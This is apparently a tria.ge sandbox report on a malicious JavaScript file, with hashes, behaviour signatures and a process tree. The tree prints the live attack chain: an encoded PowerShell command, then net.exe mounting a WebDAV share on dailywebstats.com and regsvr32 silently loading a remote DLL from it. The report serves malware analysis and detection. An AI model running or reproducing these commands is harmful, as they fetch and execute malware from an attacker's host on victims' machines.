Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
26/07/2024, 12:37
Static task
static1
Behavioral task
behavioral1
Sample
24512273992155119888.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
24512273992155119888.js
Resource
win10v2004-20240709-en
General
-
Target
24512273992155119888.js
-
Size
16KB
-
MD5
81f40ac6804ff55ae429b1f889d43919
-
SHA1
622b8e291d62965f213d0171863bf0cca613817c
-
SHA256
729ba61dd005270ac9ea1a3fcacbfd615c2b1ffcaa8c02477205590c1bd491f4
-
SHA512
82c6bdb877e62b5791c81238bcb6c9dcb69106493defdb866ed6bcf467cb87213c9e8a1007524f7de8c6c19566fc3f7dd92d93186908a03e816c96118c97aaa0
-
SSDEEP
192:6iAQi4t9L0q0hh5p1hKJHhFSAlnFaygFSAlnFCt:6i3DUmBPXyJXe
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2432 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2432 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2708 wrote to memory of 2432 2708 wscript.exe 30 PID 2708 wrote to memory of 2432 2708 wscript.exe 30 PID 2708 wrote to memory of 2432 2708 wscript.exe 30 PID 2432 wrote to memory of 2484 2432 powershell.exe 32 PID 2432 wrote to memory of 2484 2432 powershell.exe 32 PID 2432 wrote to memory of 2484 2432 powershell.exe 32 PID 2432 wrote to memory of 2732 2432 powershell.exe 33 PID 2432 wrote to memory of 2732 2432 powershell.exe 33 PID 2432 wrote to memory of 2732 2432 powershell.exe 33 PID 2432 wrote to memory of 2732 2432 powershell.exe 33 PID 2432 wrote to memory of 2732 2432 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\24512273992155119888.js1⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADQANwA4ADMANgAyADcAOQAxADMAOAAxADUALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:2484
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\4783627913815.dll3⤵PID:2732
-
-